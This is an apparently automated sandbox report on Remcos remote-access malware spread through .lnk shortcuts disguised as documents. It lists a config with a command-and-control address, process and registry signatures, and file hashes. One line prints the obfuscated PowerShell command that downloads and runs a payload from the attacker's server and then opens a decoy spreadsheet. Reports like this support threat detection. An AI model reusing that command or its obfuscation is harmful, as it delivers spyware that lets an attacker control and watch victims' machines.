Overview

Task scores (score / sample / platform):
  10  static task
  10  brt_1_0147.doc.lnk     windows7-x64
   3  brt_1_0147.doc.lnk     windows10-2004-x64
  10  oshad_88.docx.lnk      windows7-x64
   3  oshad_88.docx.lnk      windows10-2004-x64
  10  rv_luti_20...sx.lnk    windows7-x64
   3  rv_luti_20...sx.lnk    windows10-2004-x64
  10  telegrama_...pg.lnk    windows7-x64
   3  telegrama_...pg.lnk    windows10-2004-x64
Analysis (score 10)

  max time kernel:   148s
  max time network:  138s
  platform:          windows10-2004_x64
  resource:          win10v2004-20240802-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         30/08/2024, 11:11
Tasks

  static1      Static task
  behavioral1  Sample: brt_1_0147.doc.lnk             Resource: win7-20240729-en
  behavioral2  Sample: brt_1_0147.doc.lnk             Resource: win10v2004-20240802-en
  behavioral3  Sample: oshad_88.docx.lnk              Resource: win7-20240705-en
  behavioral4  Sample: oshad_88.docx.lnk              Resource: win10v2004-20240802-en
  behavioral5  Sample: rv_luti_2024_roku.xlsx.lnk     Resource: win7-20240708-en
  behavioral6  Sample: rv_luti_2024_roku.xlsx.lnk     Resource: win10v2004-20240802-en
  behavioral7  Sample: telegrama_ksv_po_btgr.jpg.lnk  Resource: win7-20240704-en
General

  Target:  rv_luti_2024_roku.xlsx.lnk
  Size:    32KB
  MD5:     0ea3d54cecf6ea4d5e6739ffe9ce4be4
  SHA1:    513dca9cb690972319181c4f31ac98dcd80ea895
  SHA256:  ddd94d9d25f4ee02343b209e6d345457ef0b3efebccfd9a16b721e1c59a6cb03
  SHA512:  33826667e53d5cdb60ccfeb84a309059e20ce5da79d7dde853578fcea99b44d2a92debe4d6da65f463223b48d1b9f510bb0c9c3b26e7fb0b2a5199eb6ead45d2
  SSDEEP:  48:88muavUQSSesYOhI3YMEDo/i1xCoXEEDDo/L8A7NZdCZFXuGdZTa7x:88y8EesYeI3hX+xCRZR4uKQ
Malware Config

Extracted

  Family:  remcos
  Botnet:  feetfuck
  C2:      83.222.191.201:24251

  audio_folder:            MicRecords
  audio_record_time:       5
  connect_delay:           0
  connect_interval:        1
  copy_file:               remcos.exe
  copy_folder:             Remcos
  delete_file:             false
  hide_file:               false
  hide_keylog_file:        false
  install_flag:            false
  keylog_crypt:            false
  keylog_file:             logs.dat
  keylog_flag:             false
  keylog_folder:           remcos
  mouse_option:            false
  mutex:                   Rmc-XTJ1YO
  screenshot_crypt:        false
  screenshot_flag:         false
  screenshot_folder:       Screenshots
  screenshot_path:         %AppData%
  screenshot_time:         10
  take_screenshot_option:  false
  take_screenshot_time:    5
Signatures

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  7     4968  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                         Process
  Key value queried  \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation  cmd.exe

Executes dropped EXE (2 IoCs)
  pid   Process
  1172  Newfts.exe
  2304  Newfts.exe

Loads dropped DLL (8 IoCs)
  pid   Process
  1172  Newfts.exe
  1172  Newfts.exe
  1172  Newfts.exe
  1172  Newfts.exe
  2304  Newfts.exe
  2304  Newfts.exe
  2304  Newfts.exe
  2304  Newfts.exe

Suspicious use of SetThreadContext (1 IoC)
  description                           pid   Process     procid_target
  PID 2304 set thread context of 5100   2304  Newfts.exe  98

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                              Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      Newfts.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      Newfts.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language      explorer.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                               Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                  EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz             EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                          Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS           EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE

Modifies registry class (1 IoC)
  description  ioc                                                                                  Process
  Key created  \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings   powershell.exe

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  4920  EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid   Process
  4968  powershell.exe
  4968  powershell.exe
  1172  Newfts.exe
  2304  Newfts.exe
  2304  Newfts.exe
  5100  cmd.exe
  5100  cmd.exe
  5100  cmd.exe
  5100  cmd.exe

Suspicious behavior: MapViewOfSection (2 IoCs)
  pid   Process
  2304  Newfts.exe
  5100  cmd.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  4968  powershell.exe

Suspicious use of SetWindowsHookEx (12 IoCs)
  pid   Process
  4920  EXCEL.EXE  (12 occurrences)

Suspicious use of WriteProcessMemory (22 IoCs)
  description                          pid   Process         procid_target
  PID 4740 wrote to memory of 4968     4740  cmd.exe         85
  PID 4740 wrote to memory of 4968     4740  cmd.exe         85
  PID 4968 wrote to memory of 1172     4968  powershell.exe  95
  PID 4968 wrote to memory of 1172     4968  powershell.exe  95
  PID 4968 wrote to memory of 1172     4968  powershell.exe  95
  PID 4968 wrote to memory of 4920     4968  powershell.exe  97
  PID 4968 wrote to memory of 4920     4968  powershell.exe  97
  PID 4968 wrote to memory of 4920     4968  powershell.exe  97
  PID 1172 wrote to memory of 2304     1172  Newfts.exe      96
  PID 1172 wrote to memory of 2304     1172  Newfts.exe      96
  PID 1172 wrote to memory of 2304     1172  Newfts.exe      96
  PID 2304 wrote to memory of 5100     2304  Newfts.exe      98
  PID 2304 wrote to memory of 5100     2304  Newfts.exe      98
  PID 2304 wrote to memory of 5100     2304  Newfts.exe      98
  PID 4920 wrote to memory of 3476     4920  EXCEL.EXE       104
  PID 4920 wrote to memory of 3476     4920  EXCEL.EXE       104
  PID 2304 wrote to memory of 5100     2304  Newfts.exe      98
  PID 5100 wrote to memory of 1540     5100  cmd.exe         110
  PID 5100 wrote to memory of 1540     5100  cmd.exe         110
  PID 5100 wrote to memory of 1540     5100  cmd.exe         110
  PID 5100 wrote to memory of 1540     5100  cmd.exe         110
  PID 5100 wrote to memory of 1540     5100  cmd.exe         110
Processes

[1] C:\Windows\system32\cmd.exe  (PID 4740)
    Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4968)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo TeuldrVGQbKMoxomeUoWOqhwvLOxvRa; echo kHymKfRwuZXnxCZJgAfmykUgOsaYlqvqidzuAVdr; echo BzhKUakeDaTwVhpLOdFPPdFVoZgkSjggfDEAGyfrfJLDRccpyaIWIA; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo kUBgvnjkEnVVtBTakWaQxmlPinKUrVTnqYKyBiuNzxKhEEivsinzTrJtp; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo KXIRBZFhgPOZEKacAcLhfiuehKFFEsRDolDsCVbHJSxXKtveGjGXJJi; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo QnvQaCnoZGPZHtQIYplmH; s''t''a''rt rv_luti_2024_roku.xlsx
        - Blocklisted process makes network request
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe  (PID 1172)
            Command line: "C:\Users\Admin\AppData\Roaming\SecurityCheck\Newfts.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

            [4] C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe  (PID 2304)
                Command line: C:\Users\Admin\AppData\Roaming\localUltra_Zfv4\Newfts.exe
                - Executes dropped EXE
                - Loads dropped DLL
                - Suspicious use of SetThreadContext
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: MapViewOfSection
                - Suspicious use of WriteProcessMemory

                [5] C:\Windows\SysWOW64\cmd.exe  (PID 5100)
                    Command line: C:\Windows\SysWOW64\cmd.exe
                    - System Location Discovery: System Language Discovery
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious behavior: MapViewOfSection
                    - Suspicious use of WriteProcessMemory

                    [6] C:\Windows\SysWOW64\explorer.exe  (PID 1540)
                        Command line: C:\Windows\SysWOW64\explorer.exe
                        - System Location Discovery: System Language Discovery

        [3] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE  (PID 4920)
            Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"
            - Checks processor information in registry
            - Enumerates system info in registry
            - Suspicious behavior: AddClipboardFormatListener
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\splwow64.exe  (PID 3476)
                Command line: C:\Windows\splwow64.exe 12288

[1] C:\Windows\system32\svchost.exe  (PID 4412)
    Command line: C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize:  1.2MB
  MD5:       c253ac4c2e9b1ea50c295a69934a6b71
  SHA1:      ba80b35a4e53c34726bc24c58e7d08b2ce01cfca
  SHA256:    53830e09dd6bd828ec6c700725946ffd836b5114f9702bb9be17bc4e056b075a
  SHA512:    eb061afebd138c51ff25a39203b66a6cb97ddc267366b71f795a9cf9ef645dbc905edc1772714c51148a5b56f15d860538f64c16b377154abc724ba8fc66be51

  Filesize:  60B
  MD5:       d17fe0a3f47be24a6453e9ef58c94641
  SHA1:      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256:    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512:    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  Filesize:  374B
  MD5:       b10dee105cdbe3e2d4eed0bff1bd4fa9
  SHA1:      e21a70382f7de528f7ed7914c97ce8b80d1d1c0b
  SHA256:    1426fa59c30f740c0bb1d56f0e4da65ba2c4c24038d0d2f13055495a7c4f28fe
  SHA512:    5c3ec72c4bee05c2bb85334cea39c6606da7174bc9dc48539a2fe8464d057fc4c6a0a7883157e25d6b8554083da19d81bd7093c6e8a1fad3bd28674dc0ccc225

  Path:      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
  Filesize:  2KB
  MD5:       d0f14522333f489d4fed683f64f0f12e
  SHA1:      93036d0978729264139ed97baceabca95af7ed80
  SHA256:    ab2e42f9671e29fc719e4f835d8726a5d3890d1b06a93d093848c440fe562639
  SHA512:    36fc63f3c4f87c84fa2217dcd5f7fb9cbb79ceda6246df3b26682e439bfb0216e807c0e35342750cc108069b3b6c39fdefa92431b60b7f6d2d16e2ebf60268c6

  Path:      C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
  Filesize:  3KB
  MD5:       939fce2123fbc7c6e63a1c8ed6bb10a6
  SHA1:      5729e5c73f9e31af5597fddbf6dbb9b2c4cd4773
  SHA256:    2b852b6c3bf57a50406e70577008c1f25216f7eaecbcd0ac79f7f27191d8be07
  SHA512:    d912ed3e44817a38413c3bfc43de0dc8d34690da3c36b4b7c4bb2ccb6e96bb730837553628e1da30124cc73fafbdcb412bc47a1fd897a7614d2a4508e06e488b

  Filesize:  2.1MB
  MD5:       db7e67835fce6cf9889f0f68ca9c29a9
  SHA1:      5565afda37006a66f0e4546105be60bbe7970616
  SHA256:    dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738
  SHA512:    bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b

  Filesize:  1.1MB
  MD5:       59c15c71fd599ff745a862d0b8932919
  SHA1:      8384f88b4cac4694cf510ca0d3f867fd83cc9e18
  SHA256:    c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2
  SHA512:    be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e

  Filesize:  1.4MB
  MD5:       6fdb2e9ca6b7a5ad510e2b29831e3bc8
  SHA1:      4a14ee9d5660eb271a6b5f18a55ac3e05f952c68
  SHA256:    f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38
  SHA512:    d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06

  Filesize:  31KB
  MD5:       5dc69a3e2fda6cb740f363ef77edcc13
  SHA1:      c177fabf17346531e07d562be11915bf2822148a
  SHA256:    7c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621
  SHA512:    b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f

  Filesize:  1.0MB
  MD5:       471076308d78944d45ab35d37134134a
  SHA1:      05cf2cf6e5d11ce10425b14d68cda3246cc47263
  SHA256:    38d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b
  SHA512:    7f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3

  Filesize:  32KB
  MD5:       21046015d5d9ef5e536ac7643b1ab365
  SHA1:      f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05
  SHA256:    7a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd
  SHA512:    d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e